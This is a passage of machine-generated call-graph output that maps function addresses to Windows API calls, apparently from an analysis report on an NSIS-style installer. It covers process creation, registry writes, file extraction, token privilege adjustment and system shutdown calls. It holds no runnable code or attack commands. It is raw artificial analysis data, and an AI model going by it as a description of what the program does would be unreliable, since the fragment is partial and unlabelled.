4031->4033 4034 40155b 4035 4029f2 4034->4035 4038 405f61 wsprintfW 4035->4038 4037 4029f7 4038->4037 4039 401bdf 4040 402ba2 18 API calls 4039->4040 4041 401be6 4040->4041 4042 402ba2 18 API calls 4041->4042 4043 401bf0 4042->4043 4044 401c00 4043->4044 4045 402bbf 18 API calls 4043->4045 4046 402bbf 18 API calls 4044->4046 4049 401c10 4044->4049 4045->4044 4046->4049 4047 401c1b 4050 402ba2 18 API calls 4047->4050 4048 401c5f 4051 402bbf 18 API calls 4048->4051 4049->4047 4049->4048 4052 401c20 4050->4052 4053 401c64 4051->4053 4055 402ba2 18 API calls 4052->4055 4054 402bbf 18 API calls 4053->4054 4056 401c6d FindWindowExW 4054->4056 4057 401c29 4055->4057 4060 401c8f 4056->4060 4058 401c31 SendMessageTimeoutW 4057->4058 4059 401c4f SendMessageW 4057->4059 4058->4060 4059->4060 4061 4022df 4062 402bbf 18 API calls 4061->4062 4063 4022ee 4062->4063 4064 402bbf 18 API calls 4063->4064 4065 4022f7 4064->4065 4066 402bbf 18 API calls 4065->4066 4067 402301 GetPrivateProfileStringW 4066->4067 4068 401960 4069 402ba2 18 API calls 4068->4069 4070 401967 4069->4070 4071 402ba2 18 API calls 4070->4071 4072 401971 4071->4072 4073 402bbf 18 API calls 4072->4073 4074 40197a 4073->4074 4075 40198e lstrlenW 4074->4075 4076 4019ca 4074->4076 4077 401998 4075->4077 4077->4076 4081 40601a lstrcpynW 4077->4081 4079 4019b3 4079->4076 4080 4019c0 lstrlenW 4079->4080 4080->4076 4081->4079 4082 401662 4083 402bbf 18 API calls 4082->4083 4084 401668 4083->4084 4085 40635d 2 API calls 4084->4085 4086 40166e 4085->4086 4087 4066e2 4093 406566 4087->4093 4088 406ed1 4089 4065f0 GlobalAlloc 4089->4088 4089->4093 4090 4065e7 GlobalFree 4090->4089 4091 406667 GlobalAlloc 4091->4088 4091->4093 4092 40665e GlobalFree 4092->4091 4093->4088 4093->4089 4093->4090 4093->4091 4093->4092 4094 4019e4 4095 402bbf 18 API calls 4094->4095 4096 4019eb 4095->4096 4097 402bbf 18 API calls 4096->4097 4098 4019f4 4097->4098 4099 4019fb lstrcmpiW 4098->4099 4100 401a0d lstrcmpW 4098->4100 4101 401a01 4099->4101 4100->4101 4102 4025e5 4103 402ba2 18 API calls 4102->4103 4111 4025f4 4103->4111 4104 40272d 4105 40263a ReadFile 4105->4104 4105->4111 4106 405c72 ReadFile 4106->4111 4107 40267a MultiByteToWideChar 4107->4111 4108 40272f 4124 405f61 wsprintfW 4108->4124 4111->4104 4111->4105 4111->4106 4111->4107 4111->4108 4112 4026a0 SetFilePointer MultiByteToWideChar 4111->4112 4113 402740 4111->4113 4115 405cd0 SetFilePointer 4111->4115 4112->4111 4113->4104 4114 402761 SetFilePointer 4113->4114 4114->4104 4116 405cec 4115->4116 4122 405d08 4115->4122 4117 405c72 ReadFile 4116->4117 4118 405cf8 4117->4118 4119 405d11 SetFilePointer 4118->4119 4120 405d39 SetFilePointer 4118->4120 4118->4122 4119->4120 4121 405d1c 4119->4121 4120->4122 4123 405ca1 WriteFile 4121->4123 4122->4111 4123->4122 4124->4104 3078 401e66 3096 402bbf 3078->3096 3085 401edb CloseHandle 3088 40281e 3085->3088 3086 401e8c WaitForSingleObject 3087 401e9e 3086->3087 3089 401eb0 GetExitCodeProcess 3087->3089 3116 406430 3087->3116 3091 401ec2 3089->3091 3092 401ecf 3089->3092 3120 405f61 wsprintfW 3091->3120 3092->3085 3095 401ecd 3092->3095 3095->3085 3097 402bcb 3096->3097 3121 40603c 3097->3121 3100 401e6c 3102 405179 3100->3102 3104 405194 3102->3104 3112 401e76 3102->3112 3103 4051b0 lstrlenW 3105 4051d9 3103->3105 3106 4051be lstrlenW 3103->3106 3104->3103 3107 40603c 18 API calls 3104->3107 3109 4051ec 3105->3109 3110 4051df SetWindowTextW 3105->3110 3108 4051d0 lstrcatW 3106->3108 3106->3112 3107->3103 3108->3105 3111 4051f2 SendMessageW SendMessageW SendMessageW 3109->3111 3109->3112 3110->3109 3111->3112 3113 4056fa CreateProcessW 3112->3113 3114 401e7c 3113->3114 3115 40572d CloseHandle 3113->3115 3114->3085 3114->3086 3114->3088 3115->3114 3117 40644d PeekMessageW 3116->3117 3118 406443 DispatchMessageW 3117->3118 3119 401ea5 WaitForSingleObject 3117->3119 3118->3117 3119->3087 3120->3095 3136 406049 3121->3136 3122 406294 3123 402bec 3122->3123 3155 40601a lstrcpynW 3122->3155 3123->3100 3139 4062ae 3123->3139 3125 4060fc GetVersion 3125->3136 3126 406262 lstrlenW 3126->3136 3127 40603c 10 API calls 3127->3126 3130 406177 GetSystemDirectoryW 3130->3136 3132 40618a GetWindowsDirectoryW 3132->3136 3133 4062ae 5 API calls 3133->3136 3134 40603c 10 API calls 3134->3136 3135 406203 lstrcatW 3135->3136 3136->3122 3136->3125 3136->3126 3136->3127 3136->3130 3136->3132 3136->3133 3136->3134 3136->3135 3137 4061be SHGetSpecialFolderLocation 3136->3137 3148 405ee7 RegOpenKeyExW 3136->3148 3153 405f61 wsprintfW 3136->3153 3154 40601a lstrcpynW 3136->3154 3137->3136 3138 4061d6 SHGetPathFromIDListW CoTaskMemFree 3137->3138 3138->3136 3140 4062bb 3139->3140 3142 406324 CharNextW 3140->3142 3144 406331 3140->3144 3146 406310 CharNextW 3140->3146 3147 40631f CharNextW 3140->3147 3156 4059fb 3140->3156 3141 406336 CharPrevW 3141->3144 3142->3140 3142->3144 3144->3141 3145 406357 3144->3145 3145->3100 3146->3140 3147->3142 3149 405f5b 3148->3149 3150 405f1b RegQueryValueExW 3148->3150 3149->3136 3151 405f3c RegCloseKey 3150->3151 3151->3149 3153->3136 3154->3136 3155->3123 3157 405a01 3156->3157 3158 405a17 3157->3158 3159 405a08 CharNextW 3157->3159 3158->3140 3159->3157 3263 401767 3264 402bbf 18 API calls 3263->3264 3265 40176e 3264->3265 3266 401796 3265->3266 3267 40178e 3265->3267 3327 40601a lstrcpynW 3266->3327 3326 40601a lstrcpynW 3267->3326 3270 401794 3274 4062ae 5 API calls 3270->3274 3271 4017a1 3328 4059ce lstrlenW CharPrevW 3271->3328 3276 4017b3 3274->3276 3279 4017c5 CompareFileTime 3276->3279 3280 401885 3276->3280 3281 40185c 3276->3281 3284 40601a lstrcpynW 3276->3284 3290 40603c 18 API calls 3276->3290 3301 405bca GetFileAttributesW 3276->3301 3304 405bef GetFileAttributesW CreateFileW 3276->3304 3331 40635d FindFirstFileW 3276->3331 3334 40575f 3276->3334 3279->3276 3282 405179 25 API calls 3280->3282 3283 405179 25 API calls 3281->3283 3291 401871 3281->3291 3285 40188f 3282->3285 3283->3291 3284->3276 3305 403027 3285->3305 3288 4018b6 SetFileTime 3289 4018c8 CloseHandle 3288->3289 3289->3291 3292 4018d9 3289->3292 3290->3276 3293 4018f1 3292->3293 3294 4018de 3292->3294 3296 40603c 18 API calls 3293->3296 3295 40603c 18 API calls 3294->3295 3298 4018e6 lstrcatW 3295->3298 3299 4018f9 3296->3299 3298->3299 3300 40575f MessageBoxIndirectW 3299->3300 3300->3291 3302 405be9 3301->3302 3303 405bdc SetFileAttributesW 3301->3303 3302->3276 3303->3302 3304->3276 3307 403040 3305->3307 3306 40306b 3338 40320c 3306->3338 3307->3306 3350 403222 SetFilePointer 3307->3350 3311 403088 GetTickCount 3322 40309b 3311->3322 3312 4031ac 3313 4031b0 3312->3313 3318 4031c8 3312->3318 3315 40320c ReadFile 3313->3315 3314 4018a2 3314->3288 3314->3289 3315->3314 3316 40320c ReadFile 3316->3318 3317 40320c ReadFile 3317->3322 3318->3314 3318->3316 3319 405ca1 WriteFile 3318->3319 3319->3318 3321 403101 GetTickCount 3321->3322 3322->3314 3322->3317 3322->3321 3323 40312a MulDiv wsprintfW 3322->3323 3341 406533 3322->3341 3348 405ca1 WriteFile 3322->3348 3324 405179 25 API calls 3323->3324 3324->3322 3326->3270 3327->3271 3329 4017a7 lstrcatW 3328->3329 3330 4059ea lstrcatW 3328->3330 3329->3270 3330->3329 3332 406373 FindClose 3331->3332 3333 40637e 3331->3333 3332->3333 3333->3276 3335 405774 3334->3335 3336 4057c0 3335->3336 3337 405788 MessageBoxIndirectW 3335->3337 3336->3276 3337->3336 3351 405c72 ReadFile 3338->3351 3342 406558 3341->3342 3343 406560 3341->3343 3342->3322 3343->3342 3344 4065f0 GlobalAlloc 3343->3344 3345 4065e7 GlobalFree 3343->3345 3346 406667 GlobalAlloc 3343->3346 3347 40665e GlobalFree 3343->3347 3344->3342 3344->3343 3345->3344 3346->3342 3346->3343 3347->3346 3349 405cbf 3348->3349 3349->3322 3350->3306 3352 403076 3351->3352 3352->3311 3352->3312 3352->3314 4125 401ee9 4126 402bbf 18 API calls 4125->4126 4127 401ef0 4126->4127 4128 40635d 2 API calls 4127->4128 4129 401ef6 4128->4129 4131 401f07 4129->4131 4132 405f61 wsprintfW 4129->4132 4132->4131 3481 40326a SetErrorMode GetVersion 3482 4032a5 3481->3482 3483 40329f 3481->3483 3485 406384 3 API calls 3482->3485 3484 4063f4 5 API calls 3483->3484 3484->3482 3486 4032bb lstrlenA 3485->3486 3486->3482 3487 4032cb 3486->3487 3488 4063f4 5 API calls 3487->3488 3489 4032d3 3488->3489 3490 4063f4 5 API calls 3489->3490 3491 4032da #17 OleInitialize SHGetFileInfoW 3490->3491 3569 40601a lstrcpynW 3491->3569 3493 403317 GetCommandLineW 3570 40601a lstrcpynW 3493->3570 3495 403329 GetModuleHandleW 3496 403341 3495->3496 3497 4059fb CharNextW 3496->3497 3498 403350 CharNextW 3497->3498 3499 40347a GetTempPathW 3498->3499 3507 403369 3498->3507 3571 403239 3499->3571 3501 403492 3502 403496 GetWindowsDirectoryW lstrcatW 3501->3502 3503 4034ec DeleteFileW 3501->3503 3504 403239 12 API calls 3502->3504 3581 402dee GetTickCount GetModuleFileNameW 3503->3581 3508 4034b2 3504->3508 3505 4059fb CharNextW 3505->3507 3507->3505 3512 403465 3507->3512 3514 403463 3507->3514 3508->3503 3510 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3508->3510 3509 403500 3518 4059fb CharNextW 3509->3518 3552 4035a3 3509->3552 3564 4035b3 3509->3564 3513 403239 12 API calls 3510->3513 3665 40601a lstrcpynW 3512->3665 3516 4034e4 3513->3516 3514->3499 3516->3503 3516->3564 3531 40351f 3518->3531 3520 4036ed 3523 403771 ExitProcess 3520->3523 3524 4036f5 GetCurrentProcess OpenProcessToken 3520->3524 3521 4035cd 3522 40575f MessageBoxIndirectW 3521->3522 3526 4035db ExitProcess 3522->3526 3529 403741 3524->3529 3530 40370d LookupPrivilegeValueW AdjustTokenPrivileges 3524->3530 3527 4035e3 3533 4056e2 5 API calls 3527->3533 3528 40357d 3666 405ad6 3528->3666 3534 4063f4 5 API calls 3529->3534 3530->3529 3531->3527 3531->3528 3536 4035e8 lstrcatW 3533->3536 3537 403748 3534->3537 3538 403604 lstrcatW lstrcmpiW 3536->3538 3539 4035f9 lstrcatW 3536->3539 3540 40375d ExitWindowsEx 3537->3540 3541 40376a 3537->3541 3543 403620 3538->3543 3538->3564 3539->3538 3540->3523 3540->3541 3544 40140b 2 API calls 3541->3544 3546 403625 3543->3546 3547 40362c 3543->3547 3544->3523 3545 403598 3681 40601a lstrcpynW 3545->3681 3550 405648 4 API calls 3546->3550 3548 4056c5 2 API calls 3547->3548 3551 403631 SetCurrentDirectoryW 3548->3551 3553 40362a 3550->3553 3554 403641 3551->3554 3555 40364c 3551->3555 3609 403863 3552->3609 3553->3551 3689 40601a lstrcpynW 3554->3689 3690 40601a lstrcpynW 3555->3690 3558 40603c 18 API calls 3559 40368b DeleteFileW 3558->3559 3560 403698 CopyFileW 3559->3560 3566 40365a 3559->3566 3560->3566 3561 4036e1 3562 405ebb 38 API calls 3561->3562 3562->3564 3682 403789 3564->3682 3565 40603c 18 API calls 3565->3566 3566->3558 3566->3561 3566->3565 3567 4056fa 2 API calls 3566->3567 3568 4036cc CloseHandle 3566->3568 3691 405ebb MoveFileExW 3566->3691 3567->3566 3568->3566 3569->3493 3570->3495 3572 4062ae 5 API calls 3571->3572 3573 403245 3572->3573 3574 40324f 3573->3574 3575 4059ce 3 API calls 3573->3575 3574->3501 3576 403257 3575->3576 3577 4056c5 2 API calls 3576->3577 3578 40325d 3577->3578 3695 405c1e 3578->3695 3699 405bef GetFileAttributesW CreateFileW 3581->3699 3583 402e2e 3602 402e3e 3583->3602 3700 40601a lstrcpynW 3583->3700 3585 402e54 3701 405a1a lstrlenW 3585->3701 3589 402e65 GetFileSize 3590 402f61 3589->3590 3608 402e7c 3589->3608 3706 402d8a 3590->3706 3592 402f6a 3594 402f9a GlobalAlloc 3592->3594 3592->3602 3718 403222 SetFilePointer 3592->3718 3593 40320c ReadFile 3593->3608 3717 403222 SetFilePointer 3594->3717 3596 402fcd 3598 402d8a 6 API calls 3596->3598 3598->3602 3599 402f83 3603 40320c ReadFile 3599->3603 3600 402fb5 3601 403027 36 API calls 3600->3601 3606 402fc1 3601->3606 3602->3509 3604 402f8e 3603->3604 3604->3594 3604->3602 3605 402d8a 6 API calls 3605->3608 3606->3602 3606->3606 3607 402ffe SetFilePointer 3606->3607 3607->3602 3608->3590 3608->3593 3608->3596 3608->3602 3608->3605 3610 4063f4 5 API calls 3609->3610 3611 403877 3610->3611 3612 40387d 3611->3612 3613 40388f 3611->3613 3728 405f61 wsprintfW 3612->3728 3614 405ee7 3 API calls 3613->3614 3615 4038bf 3614->3615 3617 4038de lstrcatW 3615->3617 3619 405ee7 3 API calls 3615->3619 3618 40388d 3617->3618 3719 403b39 3618->3719 3619->3617 3622 405ad6 18 API calls 3623 403910 3622->3623 3624 4039a4 3623->3624 3627 405ee7 3 API calls 3623->3627 3625 405ad6 18 API calls 3624->3625 3626 4039aa 3625->3626 3629 4039ba LoadImageW 3626->3629 3630 40603c 18 API calls 3626->3630 3628 403942 3627->3628 3628->3624 3633 403963 lstrlenW 3628->3633 3637 4059fb CharNextW 3628->3637 3631 403a60 3629->3631 3632 4039e1 RegisterClassW 3629->3632 3630->3629 3636 40140b 2 API calls 3631->3636 3634 403a17 SystemParametersInfoW CreateWindowExW 3632->3634 3635 403a6a 3632->3635 3638 403971 lstrcmpiW 3633->3638 3639 403997 3633->3639 3634->3631 3635->3564 3640 403a66 3636->3640 3641 403960 3637->3641 3638->3639 3642 403981 GetFileAttributesW 3638->3642 3643 4059ce 3 API calls 3639->3643 3640->3635 3645 403b39 19 API calls 3640->3645 3641->3633 3644 40398d 3642->3644 3646 40399d 3643->3646 3644->3639 3647 405a1a 2 API calls 3644->3647 3648 403a77 3645->3648 3729 40601a lstrcpynW 3646->3729 3647->3639 3650 403a83 ShowWindow 3648->3650 3651 403b06 3648->3651 3653 406384 3 API calls 3650->3653 3652 40524c 5 API calls 3651->3652 3655 403b0c 3652->3655 3654 403a9b 3653->3654 3656 403aa9 GetClassInfoW 3654->3656 3658 406384 3 API calls 3654->3658 3657 403b28 3655->3657 3662 403b10 3655->3662 3660 403ad3 DialogBoxParamW 3656->3660 3661 403abd GetClassInfoW RegisterClassW 3656->3661 3659 40140b 2 API calls 3657->3659 3658->3656 3659->3635 3663 40140b 2 API calls 3660->3663 3661->3660 3662->3635 3664 40140b 2 API calls 3662->3664 3663->3635 3664->3635 3665->3514 3731 40601a lstrcpynW 3666->3731 3668 405ae7 3669 405a79 4 API calls 3668->3669 3670 405aed 3669->3670 3671 403589 3670->3671 3672 4062ae 5 API calls 3670->3672 3671->3564 3680 40601a lstrcpynW 3671->3680 3678 405afd 3672->3678 3673 405b2e lstrlenW 3674 405b39 3673->3674 3673->3678 3676 4059ce 3 API calls 3674->3676 3675 40635d 2 API calls 3675->3678 3677 405b3e GetFileAttributesW 3676->3677 3677->3671 3678->3671 3678->3673 3678->3675 3679 405a1a 2 API calls 3678->3679 3679->3673 3680->3545 3681->3552 3683 4037a1 3682->3683 3684 403793 CloseHandle 3682->3684 3732 4037ce 3683->3732 3684->3683 3689->3555 3690->3566 3692 405edc 3691->3692 3693 405ecf 3691->3693 3692->3566 3782 405d49 lstrcpyW 3693->3782 3696 405c2b GetTickCount GetTempFileNameW 3695->3696 3697 405c61 3696->3697 3698 403268 3696->3698 3697->3696 3697->3698 3698->3501 3699->3583 3700->3585 3702 405a28 3701->3702 3703 402e5a 3702->3703 3704 405a2e CharPrevW 3702->3704 3705 40601a lstrcpynW 3703->3705 3704->3702 3704->3703 3705->3589 3707 402d93 3706->3707 3708 402dab 3706->3708 3711 402da3 3707->3711 3712 402d9c DestroyWindow 3707->3712 3709 402db3 3708->3709 3710 402dbb GetTickCount 3708->3710 3713 406430 2 API calls 3709->3713 3714 402dc9 CreateDialogParamW ShowWindow 3710->3714 3715 402dec 3710->3715 3711->3592 3712->3711 3716 402db9 3713->3716 3714->3715 3715->3592 3716->3592 3717->3600 3718->3599 3720 403b4d 3719->3720 3730 405f61 wsprintfW 3720->3730 3722 403bbe 3723 40603c 18 API calls 3722->3723 3724 403bca SetWindowTextW 3723->3724 3725 4038ee 3724->3725 3726 403be6 3724->3726 3725->3622 3726->3725 3727 40603c 18 API calls 3726->3727 3727->3726 3728->3618 3729->3624 3730->3722 3731->3668 3733 4037dc 3732->3733 3734 4037e1 FreeLibrary GlobalFree 3733->3734 3735 4037a6 3733->3735 3734->3734 3734->3735 3736 40580b 3735->3736 3737 405ad6 18 API calls 3736->3737 3738 40582b 3737->3738 3739 405833 DeleteFileW 3738->3739 3740 40584a 3738->3740 3741 4035bc OleUninitialize 3739->3741 3742 40596a 3740->3742 3772 40601a lstrcpynW 3740->3772 3741->3520 3741->3521 3742->3741 3749 40635d 2 API calls 3742->3749 3744 405870 3745 405883 3744->3745 3746 405876 lstrcatW 3744->3746 3748 405a1a 2 API calls 3745->3748 3747 405889 3746->3747 3750 405899 lstrcatW 3747->3750 3752 4058a4 lstrlenW FindFirstFileW 3747->3752 3748->3747 3751 40598f 3749->3751 3750->3752 3751->3741 3753 4059ce 3 API calls 3751->3753 3752->3742 3770 4058c6 3752->3770 3754 405999 3753->3754 3756 4057c3 5 API calls 3754->3756 3755 40594d FindNextFileW 3759 405963 FindClose 3755->3759 3755->3770 3758 4059a5 3756->3758 3760 4059a9 3758->3760 3761 4059bf 3758->3761 3759->3742 3760->3741 3764 405179 25 API calls 3760->3764 3763 405179 25 API calls 3761->3763 3763->3741 3766 4059b6 3764->3766 3765 40580b 62 API calls 3765->3770 3768 405ebb 38 API calls 3766->3768 3767 405179 25 API calls 3767->3755 3768->3741 3769 405179 25 API calls 3769->3770 3770->3755 3770->3765 3770->3767 3770->3769 3771 405ebb 38 API calls 3770->3771 3773 40601a lstrcpynW 3770->3773 3774 4057c3 3770->3774 3771->3770 3772->3744 3773->3770 3775 405bca 2 API calls 3774->3775 3776 4057cf 3775->3776 3777 4057f0 3776->3777 3778 4057e6 DeleteFileW 3776->3778 3779 4057de RemoveDirectoryW 3776->3779 3777->3770 3780 4057ec 3778->3780 3779->3780 3780->3777 3781 4057fc SetFileAttributesW 3780->3781 3781->3777 3783 405d71 3782->3783 3784 405d97 GetShortPathNameW 3782->3784 3809 405bef GetFileAttributesW CreateFileW 3783->3809 3786 405eb6 3784->3786 3787 405dac 3784->3787 3786->3692 3787->3786 3789 405db4 wsprintfA 3787->3789 3788 405d7b CloseHandle GetShortPathNameW 3788->3786 3790 405d8f 3788->3790 3791 40603c 18 API calls 3789->3791 3790->3784 3790->3786 3792 405ddc 3791->3792 3810 405bef GetFileAttributesW CreateFileW 3792->3810 3794 405de9 3794->3786 3795 405df8 GetFileSize GlobalAlloc 3794->3795 3796 405e1a 3795->3796 3797 405eaf CloseHandle 3795->3797 3798 405c72 ReadFile 3796->3798 3797->3786 3799 405e22 3798->3799 3799->3797 3811 405b54 lstrlenA 3799->3811 3802 405e39 lstrcpyA 3805 405e5b 3802->3805 3803 405e4d 3804 405b54 4 API calls 3803->3804 3804->3805 3806 405e92 SetFilePointer 3805->3806 3807 405ca1 WriteFile 3806->3807 3808 405ea8 GlobalFree 3807->3808 3808->3797 3809->3788 3810->3794 3812 405b95 lstrlenA 3811->3812 3813 405b9d 3812->3813 3814 405b6e lstrcmpiA 3812->3814 3813->3802 3813->3803 3814->3813 3815 405b8c CharNextA 3814->3815 3815->3812 4133 4021ea 4134 402bbf 18 API calls 4133->4134 4135 4021f0 4134->4135 4136 402bbf 18 API calls 4135->4136 4137 4021f9 4136->4137 4138 402bbf 18 API calls 4137->4138 4139 402202 4138->4139 4140 40635d 2 API calls 4139->4140 4141 40220b 4140->4141 4142 40221c lstrlenW lstrlenW 4141->4142 4143 40220f 4141->4143 4144 405179 25 API calls 4142->4144 4145 405179 25 API calls 4143->4145 4146 402217 4143->4146 4147 40225a SHFileOperationW 4144->4147 4145->4146 4147->4143 4147->4146 4148 40156b 4149 401584 4148->4149 4150 40157b ShowWindow 4148->4150 4151 401592 ShowWindow 4149->4151 4152 402a4c 4149->4152 4150->4149 4151->4152 4160 4050ed 4161 405111 4160->4161 4162 4050fd 4160->4162 4165 405119 IsWindowVisible 4161->4165 4171 405130 4161->4171 4163 405103 4162->4163 4164 40515a 4162->4164 4167 40412a SendMessageW 4163->4167 4166 40515f CallWindowProcW 4164->4166 4165->4164 4168 405126 4165->4168 4170 40510d 4166->4170 4167->4170 4173 404a43 SendMessageW 4168->4173 4171->4166 4178 404ac3 4171->4178 4174 404aa2 SendMessageW 4173->4174 4175 404a66 GetMessagePos ScreenToClient SendMessageW 4173->4175 4176 404a9a 4174->4176 4175->4176 4177 404a9f 4175->4177 4176->4171 4177->4174 4187 40601a lstrcpynW 4178->4187 4180 404ad6 4188 405f61 wsprintfW 4180->4188 4182 404ae0 4183 40140b 2 API calls 4182->4183 4184 404ae9 4183->4184 4189 40601a lstrcpynW 4184->4189 4186 404af0 4186->4164 4187->4180 4188->4182 4189->4186 4190 40226e 4191 402275 4190->4191 4195 402288 4190->4195 4192 40603c 18 API calls 4191->4192 4193 402282 4192->4193 4194 40575f MessageBoxIndirectW 4193->4194 4194->4195 4196 4014f1 SetForegroundWindow 4197 402a4c 4196->4197 4198 4041f2 lstrcpynW lstrlenW 4199 401673 4200 402bbf 18 API calls 4199->4200 4201 40167a 4200->4201 4202 402bbf 18 API calls 4201->4202 4203 401683 4202->4203 4204 402bbf 18 API calls 4203->4204 4205 40168c MoveFileW 4204->4205 4206 401698 4205->4206 4207 40169f 4205->4207 4209 401423 25 API calls 4206->4209 4208 40635d 2 API calls 4207->4208 4211 4021e1 4207->4211 4210 4016ae 4208->4210 4209->4211 4210->4211 4212 405ebb 38 API calls 4210->4212 4212->4206 4213 404af5 GetDlgItem GetDlgItem 4214 404b47 7 API calls 4213->4214 4226 404d60 4213->4226 4215 404bea DeleteObject 4214->4215 4216 404bdd SendMessageW 4214->4216 4217 404bf3 4215->4217 4216->4215 4219 404c2a 4217->4219 4220 40603c 18 API calls 4217->4220 4218 404e44 4222 404ef0 4218->4222 4228 404d53 4218->4228 4233 404e9d SendMessageW 4218->4233 4221 4040de 19 API calls 4219->4221 4223 404c0c SendMessageW SendMessageW 4220->4223 4227 404c3e 4221->4227 4224 404f02 4222->4224 4225 404efa SendMessageW 4222->4225 4223->4217 4236 404f14 ImageList_Destroy 4224->4236 4237 404f1b 4224->4237 4242 404f2b 4224->4242 4225->4224 4226->4218 4231 404a43 5 API calls 4226->4231 4248 404dd1 4226->4248 4232 4040de 19 API calls 4227->4232 4229 404145 8 API calls 4228->4229 4235 4050e6 4229->4235 4230 404e36 SendMessageW 4230->4218 4231->4248 4245 404c4c 4232->4245 4233->4228 4234 404eb2 SendMessageW 4233->4234 4239 404ec5 4234->4239 4236->4237 4240 404f24 GlobalFree 4237->4240 4237->4242 4238 40509a 4238->4228 4243 4050ac ShowWindow GetDlgItem ShowWindow 4238->4243 4250 404ed6 SendMessageW 4239->4250 4240->4242 4241 404d21 GetWindowLongW SetWindowLongW 4244 404d3a 4241->4244 4242->4238 4256 404ac3 4 API calls 4242->4256 4260 404f66 4242->4260 4243->4228 4246 404d40 ShowWindow 4244->4246 4247 404d58 4244->4247 4245->4241 4249 404c9c SendMessageW 4245->4249 4251 404d1b 4245->4251 4254 404cd8 SendMessageW 4245->4254 4255 404ce9 SendMessageW 4245->4255 4264 404113 SendMessageW 4246->4264 4265 404113 SendMessageW 4247->4265 4248->4218 4248->4230 4249->4245 4250->4222 4251->4241 4251->4244 4254->4245 4255->4245 4256->4260 4257 405070 InvalidateRect 4257->4238 4258 405086 4257->4258 4266 4049fe 4258->4266 4259 404f94 SendMessageW 4263 404faa 4259->4263 4260->4259 4260->4263 4262 40501e SendMessageW SendMessageW 4262->4263 4263->4257 4263->4262 4264->4228 4265->4226 4269 404935 4266->4269 4268 404a13 4268->4238 4270 40494e 4269->4270 4271 40603c 18 API calls 4270->4271 4272 4049b2 4271->4272 4273 40603c 18 API calls 4272->4273 4274 4049bd 4273->4274 4275 40603c 18 API calls 4274->4275 4276 4049d3 lstrlenW wsprintfW SetDlgItemTextW 4275->4276 4276->4268 4277 404579 4278 4045a5 4277->4278 4279 4045b6 4277->4279 4338 405743 GetDlgItemTextW 4278->4338 4281 4045c2 GetDlgItem 4279->4281 4288 404621 4279->4288 4283 4045d6 4281->4283 4282 4045b0 4285 4062ae 5 API calls 4282->4285 4286 4045ea SetWindowTextW 4283->4286 4291 405a79 4 API calls 4283->4291 4284 404705 4287 4048b4 4284->4287 4340 405743 GetDlgItemTextW 4284->4340 4285->4279 4292 4040de 19 API calls 4286->4292 4290 404145 8 API calls 4287->4290 4288->4284 4288->4287 4293 40603c 18 API calls 4288->4293 4295 4048c8 4290->4295 4296 4045e0 4291->4296 4297 404606 4292->4297 4298 404695 SHBrowseForFolderW 4293->4298 4294 404735 4299 405ad6 18 API calls 4294->4299 4296->4286 4303 4059ce 3 API calls 4296->4303 4300 4040de 19 API calls 4297->4300 4298->4284 4301 4046ad CoTaskMemFree 4298->4301 4302 40473b 4299->4302 4304 404614 4300->4304 4305 4059ce 3 API calls 4301->4305 4341 40601a lstrcpynW 4302->4341 4303->4286 4339 404113 SendMessageW 4304->4339 4307 4046ba 4305->4307 4310 4046f1 SetDlgItemTextW 4307->4310 4314 40603c 18 API calls 4307->4314 4309 40461a 4312 4063f4 5 API calls 4309->4312 4310->4284 4311 404752 4313 4063f4 5 API calls 4311->4313 4312->4288 4320 404759 4313->4320 4316 4046d9 lstrcmpiW 4314->4316 4315 40479a 4342 40601a lstrcpynW 4315->4342 4316->4310 4317 4046ea lstrcatW 4316->4317 4317->4310 4319 4047a1 4321 405a79 4 API calls 4319->4321 4320->4315 4325 405a1a 2 API calls 4320->4325 4326 4047f2 4320->4326 4322 4047a7 GetDiskFreeSpaceW 4321->4322 4324 4047cb MulDiv 4322->4324 4322->4326 4324->4326 4325->4320 4327 404863 4326->4327 4329 4049fe 21 API calls 4326->4329 4328 404886 4327->4328 4330 40140b 2 API calls 4327->4330 4343 404100 KiUserCallbackDispatcher 4328->4343 4331 404850 4329->4331 4330->4328 4333 404865 SetDlgItemTextW 4331->4333 4334 404855 4331->4334 4333->4327 4336 404935 21 API calls 4334->4336 4335 4048a2 4335->4287 4344 40450e 4335->4344 4336->4327 4338->4282 4339->4309 4340->4294 4341->4311 4342->4319 4343->4335 4345 404521 SendMessageW 4344->4345 4346 40451c 4344->4346 4345->4287 4346->4345 4347 401cfa GetDlgItem GetClientRect 4348 402bbf 18 API calls 4347->4348 4349 401d2c LoadImageW SendMessageW 4348->4349 4350 401d4a DeleteObject 4349->4350 4351 402a4c 4349->4351 4350->4351 3816 40237b 3817 402381 3816->3817 3818 402bbf 18 API calls 3817->3818 3819 402393 3818->3819 3820 402bbf 18 API calls 3819->3820 3821 40239d RegCreateKeyExW 3820->3821 3822 4023c7 3821->3822 3823 402a4c 3821->3823 3824 402bbf 18 API calls 3822->3824 3825 4023e2 3822->3825 3829 4023d8 lstrlenW 3824->3829 3828 4023ee 3825->3828 3833 402ba2 3825->3833 3827 402409 RegSetValueExW 3831 40241f RegCloseKey 3827->3831 3828->3827 3830 403027 36 API calls 3828->3830 3829->3825 3830->3827 3831->3823 3834 40603c 18 API calls 3833->3834 3835 402bb6 3834->3835 3835->3828 4352 40427b 4353 404293 4352->4353 4358 4043ad 4352->4358 4359 4040de 19 API calls 4353->4359 4354 404417 4355 404421 GetDlgItem 4354->4355 4356 4044e9 4354->4356 4357 40443b 4355->4357 4362 4044aa 4355->4362 4361 404145 8 API calls 4356->4361 4357->4362 4366 404461 6 API calls 4357->4366 4358->4354 4358->4356 4363 4043e8 GetDlgItem SendMessageW 4358->4363 4360 4042fa 4359->4360 4364 4040de 19 API calls 4360->4364 4365 4044e4 4361->4365 4362->4356 4367 4044bc 4362->4367 4383 404100 KiUserCallbackDispatcher 4363->4383 4369 404307 CheckDlgButton 4364->4369 4366->4362 4370 4044d2 4367->4370 4371 4044c2 SendMessageW 4367->4371 4381 404100 KiUserCallbackDispatcher 4369->4381 4370->4365 4375 4044d8 SendMessageW 4370->4375 4371->4370 4372 404412 4373 40450e SendMessageW 4372->4373 4373->4354 4375->4365 4376 404325 GetDlgItem 4382 404113 SendMessageW 4376->4382 4378 40433b SendMessageW 4379 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4378->4379 4380 404358 GetSysColor 4378->4380 4379->4365 4380->4379 4381->4376 4382->4378 4383->4372 4384 4027fb 4385 402bbf 18 API calls 4384->4385 4386 402802 FindFirstFileW 4385->4386 4387 40282a 4386->4387 4391 402815 4386->4391 4388 402833 4387->4388 4392 405f61 wsprintfW 4387->4392 4393 40601a lstrcpynW 4388->4393 4392->4388 